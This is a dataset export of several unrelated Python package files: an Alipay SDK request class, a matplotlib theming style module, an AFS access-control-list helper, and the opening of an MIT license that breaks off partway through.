id
stringlengths 1
8
| text
stringlengths 6
1.05M
| dataset_id
stringclasses 1
value |
---|---|---|
/alipay_sdk_python-3.6.740-py3-none-any.whl/alipay/aop/api/request/AlipayMarketingToolFengdieActivityCreateRequest.py | import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AlipayMarketingToolFengdieActivityCreateModel import AlipayMarketingToolFengdieActivityCreateModel
class AlipayMarketingToolFengdieActivityCreateRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, AlipayMarketingToolFengdieActivityCreateModel):
self._biz_content = value
else:
self._biz_content = AlipayMarketingToolFengdieActivityCreateModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'alipay.marketing.tool.fengdie.activity.create'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params | PypiClean |
/MatPlotTheme-0.1.2.zip/MatPlotTheme-0.1.2/matplottheme/style/default.py | class Style(object):
'''
This class is a collection of all painting methods provided by the
default style of MatPlotTheme.
:param palette: The palette used for coloring.
'''
def __init__(self, palette):
self.set_palette(palette)
def set_palette(self, palette):
'''
Set the palette used for coloring.
:param palette: The palette used for coloring.
'''
self.palette = palette
def legend(self, ax, *args, **kwargs):
'''
Place a legend to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param legend_alpha: The opacity of background rectangle of the legend. Default is ``0.8``.
:return: The legend
All additional input parameters are passed to :meth:`~matplotlib.axes.legend`.
.. seealso::
:meth:`matplotlib.axes.legend` for documentation on valid kwargs.
'''
# Set and get parameters.
kwargs.setdefault('frameon', True)
kwargs.setdefault('fancybox', True)
legend_alpha = kwargs.pop('legend_alpha', 0.8)
# Call MPL API
legend = ax.legend(*args, **kwargs)
if not legend:
raise ValueError("Legend is not generated. Do you add labels "
"to the source data?")
# Draw the legend rectangle
rect = legend.get_frame()
rect.set_facecolor(self.palette.legend_bgcolor)
rect.set_alpha(legend_alpha)
rect.set_linewidth(0.0)
# Set legend text
texts = legend.texts
for t in texts:
t.set_color(self.palette.dark_frame)
return legend
def plot(self, ax, *args, **kwargs):
'''
Add a line plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
:return: A list of lines that were added.
A major modification made on the line plot is the change of color
cycle, which is used to color different lines. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
employed. ``reset_color_cycle`` can reset the iterable and the color
for current line will reset to the start of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.plot`.
.. seealso::
:meth:`matplotlib.axes.plot` for documentation on valid kwargs.
'''
grid = kwargs.pop('grid', None)
result = self._plot_wrapper('plot', ax, *args, **kwargs)
if grid is not None:
self._grid('plot', ax, grid)
return result
def bar(self, ax, position, length, width=0.8, offset=None, *args, **kwargs):
'''
Add a bar plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param position: The position of each bar. Equivalent to ``left``
parameter of :meth:`matplotlib.axes.Axes.bar` when
``orientation`` is ``vertical``, or ``bottom`` when ``horizontal``.
:param length: The length of each bar. Equivalent to ``height``
parameter of :meth:`matplotlib.axes.Axes.bar` when
``orientation`` is ``vertical``, or ``width`` when ``horizontal``.
:param width: The width of each bar. Equivalent to ``width``
parameter of :meth:`matplotlib.axes.Axes.bar` when
``orientation`` is ``vertical``, or ``height`` when ``horizontal``.
:param offset: The start offset of each bar. Equivalent to ``bottom``
parameter of :meth:`matplotlib.axes.Axes.bar` when
``orientation`` is ``vertical``, or ``left`` when ``horizontal``.
:param grid: Add grid lines perpendicular to the bar orientation. Default is ``None``.
Value can be ``None``, ``'x'``, ``'y'``, ``'both'``, or ``'auto'``.
:param ticks: Remove the default positional labels and add custom
tick labels. Default is ``None``.
:param annotations: Add annotations to each bar. Default is ``None``.
:param annotations_loc: Control the position of annotations. Default is ``'out'``.
Value can be ``'out'``, ``'in'``, and ``'center'``.
:param annotations_margin: Control the margin size between annotations
and bars. The value is the portion of plot size. Default is ``0.025``.
:param reset_color_cycle: Reset the color cycle iterator of bars. Default is ``False``.
:return: :class:`matplotlib.patches.Rectangle` instances.
Parameters ``position``, ``length``, ``width``, and ``offset`` corresponds
to the first four parameters of :meth:`matplotlib.axes.Axes.bar`
and :meth:`matplotlib.axes.Axes.barh`.
A major modification made on the bar plot is the change of color
cycle, which is used to color different bars. :class:`matplotlib.axes.Axes`
uses blue as default bar color. MatPlotTheme add a color cycle, which
is control by the :class:`~matplottheme.palette.default.Palette`
employed. ``reset_color_cycle`` can reset the iterable and the color
for current bar will reset to the start of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.bar`.
.. seealso::
:meth:`matplotlib.axes.bar` for documentation on valid kwargs.
'''
# Set and get parameters
grid = kwargs.pop('grid', None)
ticks = kwargs.pop('ticks', None)
annotations = kwargs.pop('annotations', None)
annotations_loc = kwargs.pop('annotations_loc', 'out')
annotations_margin = kwargs.pop('annotations_margin', 0.025)
self._set_color_cycle_iter(ax, *args, **kwargs)
# Get current color from the color cycle if not defined by user.
if not 'color' in kwargs:
try:
color = next(ax._matplottheme_color_cycle_iter)
except StopIteration:
ax._matplottheme_color_cycle_iter = iter(
self.palette.color_cycle)
color = next(ax._matplottheme_color_cycle_iter)
kwargs['color'] = color
kwargs.setdefault('edgecolor', self.palette.frame_bgcolor)
# Call MPL API
orientation = kwargs.get('orientation', 'vertical')
if orientation == 'horizontal':
kwargs.pop('orientation')
result = ax.barh(bottom=position, width=length, height=width,
left=offset, *args, **kwargs)
else:
result = ax.bar(left=position, height=length, width=width,
bottom=offset, *args, **kwargs)
# Set initial spines
self._set_spine(ax)
# Set grid
if grid is not None:
if grid == 'auto':
self._grid(
'bar', ax, 'x' if orientation == 'horizontal' else 'y')
else:
self._grid('bar', ax, grid)
import collections
import numpy as np
# Horizontal bar post-process
if orientation == 'horizontal':
ax.tick_params(left='off')
ymin, ymax = ax.get_ylim()
# If any bar is negative, remove and add new y-axis
if not isinstance(length, collections.Iterable):
length = [length]
if any(l < 0 for l in length.tolist()):
ax.spines['left'].set_visible(False)
ax.vlines(x=0, ymin=ymin, ymax=ymax)
# Render the tick labels
middle = width / 2.0
if ticks is not None:
ax.set_yticks(np.array(position) + middle)
ax.set_yticklabels(ticks)
# Render the annotation labels
if annotations is not None:
xmin, xmax = ax.get_xlim()
# margin is the distance between bar end and the text
margin = np.log(xmax - xmin) * annotations_margin if \
kwargs.get('log') else (xmax - xmin) * annotations_margin
if not isinstance(annotations, collections.Iterable):
annotations = [annotations]
offset_pos = offset if offset is not None else [
0] * len(position)
for y, l, o, a in zip(np.array(position) + middle, length, offset_pos, annotations):
m = margin if l >= 0 else -1 * margin
if annotations_loc == 'out':
m = m
align = 'left' if l >= 0 else 'right'
elif annotations_loc == 'in':
m = -m
align = 'right' if l >= 0 else 'left'
elif annotations_loc == 'center':
m = -l / 2
align = 'center'
else:
raise ValueError('Invalid annotation location: {loc}'
.format(loc=annotations_loc))
ax.text(l + o + m, y, a,
verticalalignment='center',
horizontalalignment=align,
color=self.palette.dark_frame)
# Vertical bar post-process
else:
ax.tick_params(bottom='off')
xmin, xmax = ax.get_xlim()
# If any bar is negative, remove and add new x-axis
if not isinstance(length, collections.Iterable):
length = [length]
if any(l < 0 for l in length.tolist()):
ax.spines['bottom'].set_visible(False)
ax.hlines(y=0, xmin=xmin, xmax=xmax)
# Render the tick labels
middle = width / 2.0
if ticks is not None:
ax.set_xticks(np.array(position) + middle)
ax.set_xticklabels(ticks)
# Render the annotation labels
if annotations is not None:
ymin, ymax = ax.get_ylim()
# margin is the distance between bar end and the text
margin = np.log(ymax - ymin) * annotations_margin if \
kwargs.get('log') else (ymax - ymin) * annotations_margin
if not isinstance(annotations, collections.Iterable):
annotations = [annotations]
offset_pos = offset if offset is not None else [
0] * len(position)
for x, l, o, a in zip(np.array(position) + middle, length, offset_pos, annotations):
m = margin if l >= 0 else -1 * margin
if annotations_loc == 'out':
m = m
align = 'bottom' if l >= 0 else 'top'
elif annotations_loc == 'in':
m = -m
align = 'top' if l >= 0 else 'bottom'
elif annotations_loc == 'center':
m = -l / 2
align = 'center'
else:
raise ValueError('Invalid annotation location: {loc}'
.format(loc=annotations_loc))
ax.text(x, l + o + m, a,
verticalalignment=align,
horizontalalignment='center',
color=self.palette.dark_frame)
return result
def barh(self, ax, position, length, width=0.8, offset=None, *args, **kwargs):
'''
Add a horizontal bar plot to the input :class:`matplotlib.axes.Axes` object.
This method is a wrapper of ``self.bar()`` method. The parameter ``orientation``
is set to ``'horizontal'`` and all other parameters are passed to ``self.bar()``.
'''
kwargs['orientation'] = 'horizontal'
return self.bar(ax, position, length, width, offset, *args, **kwargs)
def scatter(self, ax, x, y, *args, **kwargs):
'''
Add a scatter plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input x-data.
:param y: Input y-data.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
:return: :class:`matplotlib.collections.PathCollection` objects.
A major modification made on the scatter plot is the change of color
cycle, which is used to color different bars. :class:`matplotlib.axes.Axes`
uses blue as default bar color. MatPlotTheme add a color cycle, which
is control by the :class:`~matplottheme.palette.default.Palette`
employed. ``reset_color_cycle`` can reset the iterable and the color
for current bar will reset to the start of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.scatter`.
.. seealso::
:meth:`matplotlib.axes.scatter` for documentation on valid kwargs.
'''
self._set_color_cycle_iter(ax, *args, **kwargs)
# Get current color from the color cycle if not defined by user.
if not 'color' in kwargs:
try:
color = next(ax._matplottheme_color_cycle_iter)
except StopIteration:
ax._matplottheme_color_cycle_iter = iter(
self.palette.color_cycle)
color = next(ax._matplottheme_color_cycle_iter)
kwargs.setdefault('facecolor', color)
# Set scatter point style
kwargs.setdefault('edgecolor', self.palette.dark_frame)
kwargs.setdefault('alpha', 0.6)
kwargs.setdefault('linewidth', 0.3)
grid = kwargs.pop('grid', None)
# Call MPL API
result = ax.scatter(x, y, *args, **kwargs)
# Set spines
self._set_spine(ax)
# Set grid
if grid is not None:
self._grid('scatter', ax, grid)
return result
def hist(self, ax, x, *args, **kwargs):
'''
Add a histogram plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input data.
:param grid: Add grid lines perpendicular to the bar orientation. Default is ``None``.
Value can be ``None``, ``'x'``, ``'y'``, ``'both'``, or ``'auto'``.
:param reset_color_cycle: Reset the color cycle iterator of bars. Default is ``False``.
:return: (n, bins, patches) or ([n0, n1, ...], bins, [patches0, patches1,...])
A major modification made on the histogram plot is the change of color
cycle, which is used to color different bars. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
employed. ``reset_color_cycle`` can reset the iterable and the color
for current bar will reset to the start of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.hist`.
.. seealso::
:meth:`matplotlib.axes.hist` for documentation on valid kwargs.
'''
# Set and get parameters
grid = kwargs.pop('grid', None)
orientation = kwargs.get('orientation', 'vertical')
kwargs.setdefault('edgecolor', self.palette.frame_bgcolor)
self._set_color_cycle(ax, *args, **kwargs)
# Call MPL API
result = ax.hist(x, *args, **kwargs)
# Set spines
self._set_spine(ax)
# Set grid
if grid is not None:
if grid == 'auto':
self._grid(
'hist', ax, 'x' if orientation == 'horizontal' else 'y')
else:
self._grid('hist', ax, grid)
return result
def boxplot(self, ax, x, *args, **kwargs):
'''
Add a box plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input data.
:param grid: Add grid lines perpendicular to the bar orientation. Default is ``None``.
Value can be ``None``, ``'x'``, ``'y'``, ``'both'``, or ``'auto'``.
:param ticks: Remove the default positional labels and add custom
tick labels. Default is ``None``.
:return: A dictionary. See :meth:`~matplotlib.axes.boxplot`.
All additional input parameters are passed to :meth:`~matplotlib.axes.boxplot`.
.. seealso::
:meth:`matplotlib.axes.boxplot` for documentation on valid kwargs.
'''
# Set and get parameters
ticks = kwargs.pop('ticks', None)
grid = kwargs.pop('grid', None)
kwargs.setdefault('widths', 0.2)
# Call MPL API
result = ax.boxplot(x, *args, **kwargs)
# Set spines
if kwargs.get('vert', True):
self._set_spine(ax, invisible=['top', 'right', 'bottom'])
else:
self._set_spine(ax, invisible=['top', 'right', 'left'])
# Set box color
import matplotlib.pyplot as plt
plt.setp(result['boxes'], color=self.palette.color_cycle[0])
plt.setp(
result['whiskers'], color=self.palette.color_cycle[0], linestyle='solid')
plt.setp(result['caps'], color=self.palette.color_cycle[0])
plt.setp(result['medians'], color=self.palette.color_cycle[1])
plt.setp(result['fliers'], color=self.palette.color_cycle[2],
marker='_' if kwargs.get('vert', True) else '|')
# Set ticks
if ticks is not None:
if kwargs.get('vert', True):
ax.set_xticklabels(ticks)
else:
ax.set_yticklabels(ticks)
# Set grid
if grid is not None:
if grid == 'auto':
self._grid(
'boxplot', ax, 'x' if not kwargs.get('vert', True) else 'y')
else:
self._grid('boxplot', ax, grid)
return result
def cohere(self, ax, x, y, *args, **kwargs):
'''
Add a coherence plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input x-data.
:param y: Input y-data.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
:return: A tuple (Cxy, f), where f are the frequencies of the coherence vector.
A major modification made on the coherence plot is the change of color
cycle, which is used to color different lines. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
employed. ``reset_color_cycle`` can reset the iterable and the color
for current line will reset to the start of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.cohere`.
.. seealso::
:meth:`matplotlib.axes.cohere` for documentation on valid kwargs.
'''
grid = kwargs.pop('grid', None)
result = self._plot_wrapper('cohere', ax, x, y, *args, **kwargs)
ax.grid(False)
if grid is not None:
self._grid('plot', ax, grid)
return result
def csd(self, ax, x, y, *args, **kwargs):
'''
Add a cross-spectral density plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input x-data.
:param y: Input y-data.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
:return: A tuple (Pxy, freqs). P is the cross spectrum (complex valued).
A major modification made on the cross-spectral density plot is the change of color
cycle, which is used to color different lines. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
employed. ``reset_color_cycle`` can reset the iterable and the color
for current line will reset to the start of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.csd`.
.. seealso::
:meth:`matplotlib.axes.csd` for documentation on valid kwargs.
'''
grid = kwargs.pop('grid', None)
result = self._plot_wrapper('csd', ax, x, y, *args, **kwargs)
ax.grid(False)
if grid is not None:
self._grid('plot', ax, grid)
return result
def psd(self, ax, x, *args, **kwargs):
'''
Add a power spectral density plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input x-data.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
:return: A tuple (Pxy, freqs). P is the cross spectrum (complex valued).
A major modification made on the power spectral density plot is the change of color
cycle, which is used to color different lines. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
employed. ``reset_color_cycle`` can reset the iterable and the color
for current line will reset to the start of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.psd`.
.. seealso::
:meth:`matplotlib.axes.psd` for documentation on valid kwargs.
'''
grid = kwargs.pop('grid', None)
result = self._plot_wrapper('psd', ax, x, *args, **kwargs)
ax.grid(False)
if grid is not None:
self._grid('plot', ax, grid)
return result
def errorbar(self, ax, x, y, *args, **kwargs):
'''
Add an errorbar plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input x-data.
:param y: Input y-data.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
:return: A tuple (plotline, caplines, barlinecols).
A major modification made on the errorbar plot is the change of color
cycle, which is used to color different lines. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
employed. ``reset_color_cycle`` can reset the iterable and the color
for current line will reset to the start of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.errorbar`.
.. seealso::
:meth:`matplotlib.axes.errorbar` for documentation on valid kwargs.
'''
grid = kwargs.pop('grid', None)
kwargs.setdefault('markeredgewidth', 1.5)
result = self._plot_wrapper('errorbar', ax, x, y, *args, **kwargs)
ax.grid(False)
if grid is not None:
self._grid('plot', ax, grid)
return result
def fill_between(self, ax, x, y1, *args, **kwargs):
'''
Add filled polygons to :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input x-data.
:param y1: Input y-data.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
A major modification made on the filled polygons is the change of color
cycle, which is used to color different lines. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
employed. ``reset_color_cycle`` can reset the iterable and the color
for current line will reset to the start of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.fill_between`.
.. seealso::
:meth:`matplotlib.axes.fill_between` for documentation on valid kwargs.
'''
grid = kwargs.pop('grid', None)
kwargs.setdefault('edgecolor', self.palette.dark_frame)
self._set_color_cycle_iter(ax, *args, **kwargs)
# Get current color from the color cycle if not defined by user.
if not 'color' in kwargs:
try:
color = next(ax._matplottheme_color_cycle_iter)
except StopIteration:
ax._matplottheme_color_cycle_iter = iter(
self.palette.color_cycle)
color = next(ax._matplottheme_color_cycle_iter)
kwargs.setdefault('facecolor', color)
# Call MPL API
result = ax.fill_between(x, y1, *args, **kwargs)
self._set_spine(ax)
if grid is not None:
self._grid('fill', ax, grid)
return result
def fill_betweenx(self, ax, y, x1, *args, **kwargs):
'''
Add filled polygons to :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param y: Input y-data.
:param x1: Input x-data.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
:return: A tuple (plotline, caplines, barlinecols).
A major modification made on the filled polygons is the change of color
cycle, which is used to color different lines. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
employed. ``reset_color_cycle`` can reset the iterable and the color
for current line will reset to the start of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.fill_betweenx`.
.. seealso::
:meth:`matplotlib.axes.fill_betweenx` for documentation on valid kwargs.
'''
grid = kwargs.pop('grid', None)
kwargs.setdefault('edgecolor', self.palette.dark_frame)
self._set_color_cycle_iter(ax, *args, **kwargs)
# Get current color from the color cycle if not defined by user.
if not 'color' in kwargs:
try:
color = next(ax._matplottheme_color_cycle_iter)
except StopIteration:
ax._matplottheme_color_cycle_iter = iter(
self.palette.color_cycle)
color = next(ax._matplottheme_color_cycle_iter)
kwargs.setdefault('facecolor', color)
# Call MPL API
result = ax.fill_betweenx(y, x1, *args, **kwargs)
self._set_spine(ax)
if grid is not None:
self._grid('fill', ax, grid)
return result
def pcolormesh(self, ax, *args, **kwargs):
'''
Add a quadrilateral mesh to :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param colorbar: Draw a color bar. Default is ``'vertical'``. Value can be
``'vertical'``, ``'horizontal'``, and ``None``.
:param xticks: Remove the default positional labels and add custom
x-axis tick labels. Default is ``None``.
:param yticks: Remove the default positional labels and add custom
y-axis tick labels. Default is ``None``.
:return: A (:class:`matplotlib.colorbar.Colorbar`, :class:`matplotlib.collections.QuadMesh`) tuple.
All additional input parameters are passed to :meth:`~matplotlib.axes.pcolormesh`.
.. seealso::
:meth:`matplotlib.axes.pcolormesh` for documentation on valid kwargs.
'''
if len(args) == 3:
x = args[0]
y = args[1]
data = args[2]
elif len(args) == 1:
x = None
y = None
data = args[0]
kwargs.setdefault('edgecolor', self.palette.dark_frame)
kwargs.setdefault('linewidth', 0)
if (data.max() <= 0):
kwargs.setdefault('cmap', self.palette.cold_map)
elif (data.min() >= 0):
kwargs.setdefault('cmap', self.palette.warm_map)
else:
kwargs.setdefault('cmap', self.palette.cold_warm_map)
colorbar = kwargs.pop('colorbar', 'vertical')
xticks = kwargs.pop('xticks', None)
yticks = kwargs.pop('yticks', None)
# Call MPL API
result = ax.pcolormesh(*args, **kwargs)
import numpy as np
# Add tick labels
if xticks is not None:
if x is None:
xticks_pos = np.arange(0.5, data.shape[1] + 0.5)
else:
xticks_pos = []
for i in range(len(x)):
xticks_pos.append((x[i + 1] - x[i]) / 2.0 + x[i])
ax.set_xticks(np.array(xticks_pos))
ax.set_xticklabels(xticks)
if yticks is not None:
if y is None:
yticks_pos = np.arange(0.5, data.shape[1] + 0.5)
else:
yticks_pos = []
for i in range(len(x)):
yticks_pos.append((x[i + 1] - x[i]) / 2.0 + x[i])
ax.set_yticks(np.array(yticks_pos))
ax.set_yticklabels(yticks)
# Draw color bar
if colorbar is not None:
c = ax.get_figure().colorbar(result, orientation=colorbar)
c.outline.set_linewidth(0)
c.ax.axes.tick_params(right='off')
else:
c = None
self._set_spine(ax, invisible=['top', 'right', 'left', 'bottom'])
return (c, result)
def _plot_wrapper(self, plot_type, ax, *args, **kwargs):
self._set_color_cycle(ax, *args, **kwargs)
kwargs.setdefault('linewidth', 1.5)
# Call MPL API
if plot_type == 'plot':
result = ax.plot(*args, **kwargs)
elif plot_type == 'cohere':
result = ax.cohere(*args, **kwargs)
elif plot_type == 'csd':
result = ax.csd(*args, **kwargs)
elif plot_type == 'psd':
result = ax.psd(*args, **kwargs)
elif plot_type == 'errorbar':
result = ax.errorbar(*args, **kwargs)
else:
raise ValueError(
'{plot_type} is unavailable'.format(plot_type=plot_type))
# Set spines
self._set_spine(ax)
return result
def _grid(self, plot_type, ax, grid, *args, **kwargs):
# Call MPL API
if plot_type in ['bar', 'hist']:
ax.grid(axis=grid, color='white', linestyle='-', linewidth=0.5)
else:
ax.grid(axis=grid, color=self.palette.dark_frame,
linestyle=':', linewidth=0.5)
def _set_color_cycle(self, ax, *args, **kwargs):
# If user decide to reset, or never set color cycle.
reset_color_cycle = kwargs.pop('reset_color_cycle', False)
if reset_color_cycle or \
not hasattr(ax, '_matplottheme_color_cycle'):
ax._matplottheme_color_cycle = self.palette.color_cycle
ax.set_color_cycle(self.palette.color_cycle)
def _set_color_cycle_iter(self, ax, *args, **kwargs):
reset_color_cycle = kwargs.pop('reset_color_cycle', False)
if reset_color_cycle or \
not hasattr(ax, '_matplottheme_color_cycle'):
ax._matplottheme_color_cycle = self.palette.color_cycle
ax._matplottheme_color_cycle_iter = iter(self.palette.color_cycle)
def _set_spine(self, ax, invisible=['top', 'right'], direction='out'):
all_spines = ['top', 'bottom', 'right', 'left']
try:
tick = dict()
for spine in invisible:
ax.spines[spine].set_visible(False)
tick[spine] = 'off'
for spine in set(all_spines).difference(set(invisible)):
ax.spines[spine].set_color(self.palette.dark_frame)
ax.tick_params(axis='both', direction=direction,
colors=self.palette.dark_frame, **tick)
except KeyError:
pass | PypiClean |
/PyAFS-0.1.1.tar.gz/PyAFS-0.1.1/afs/acl.py | from afs import _acl
from afs._acl import READ, WRITE, INSERT, LOOKUP, DELETE, LOCK, ADMINISTER, \
USR0, USR1, USR2, USR3, USR4, USR5, USR6, USR7
from afs._acl import getCallerAccess
_canonical = {
"read": "rl",
"write": "rlidwk",
"all": "rlidwka",
"mail": "lik",
"none": "",
}
_reverseCanonical = dict((y, x) for (x, y) in _canonical.iteritems())
_charBitAssoc = [
('r', READ),
('l', LOOKUP),
('i', INSERT),
('d', DELETE),
('w', WRITE),
('k', LOCK),
('a', ADMINISTER),
('A', USR0),
('B', USR1),
('C', USR2),
('D', USR3),
('E', USR4),
('F', USR5),
('G', USR6),
('H', USR7),
]
_char2bit = dict(_charBitAssoc)
def rightsToEnglish(s):
"""Turns a rlwidwka string into a canonical name if possible"""
if s in _reverseCanonical:
return _reverseCanonical[s]
else:
return ''
def readRights(s):
"""Canonicalizes string rights to bitmask"""
if s in _canonical: s = _canonical[s]
return _parseRights(s)
def showRights(r):
"""Takes a bitmask and returns a rwlidka string"""
s = ""
for char,mask in _charBitAssoc:
if r & mask == mask: s += char
return s
def _parseRights(s):
"""Parses a rwlid... rights tring to bitmask"""
r = 0
try:
for c in s:
r = r | _char2bit[c]
except KeyError:
raise ValueError
return r
def _parseAcl(inp):
lines = inp.split("\n")
npos = int(lines[0].split(" ")[0])
pos = {}
neg = {}
for l in lines[2:]:
if l == "": continue
name, acl = l.split()
if npos:
npos -= 1
pos[name] = int(acl)
else:
# negative acl
neg[name] = int(acl)
return (pos, neg)
def _unparseAcl(pos, neg):
npos = len(pos)
nneg = len(neg)
acl = "%d\n%d\n" % (npos, nneg)
for p in pos.items():
acl += "%s\t%d\n" % p
for n in neg.items():
acl += "%s\t%d\n" % n
return acl
class ACL(object):
def __init__(self, pos, neg):
"""
``pos``
Dictionary of usernames to positive ACL bitmasks
``neg``
Dictionary of usernames to negative ACL bitmasks
"""
self.pos = pos
self.neg = neg
@staticmethod
def retrieve(dir, follow=True):
"""Retrieve the ACL for an AFS directory"""
pos, neg = _parseAcl(_acl.getAcl(dir, follow))
return ACL(pos, neg)
def apply(self, dir, follow=True):
"""Apply the ACL to a directory"""
self._clean()
_acl.setAcl(dir, _unparseAcl(self.pos, self.neg), follow)
def _clean(self):
"""Clean an ACL by removing any entries whose bitmask is 0"""
for n,a in self.pos.items():
if a == 0:
del self.pos[n]
for n,a in self.neg.items():
if a == 0:
del self.neg[n]
def set(self, user, bitmask, negative=False):
"""Set the bitmask for a given user"""
if bitmask < 0 or bitmask > max(_char2bit.values()):
raise ValueError, "Invalid bitmask"
if negative:
self.neg[user] = bitmask
else:
self.pos[user] = bitmask
def remove(self, user, negative=False):
"""Convenience function to removeSet the bitmask for a given user"""
self.set(user, 0, negative) | PypiClean |
/jupyterlab_remote_contents-0.1.1.tar.gz/jupyterlab_remote_contents-0.1.1/node_modules/encoding-down/LICENSE.md | # The MIT License (MIT)
**Copyright © 2012-present [Contributors](CONTRIBUTORS.md).**
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
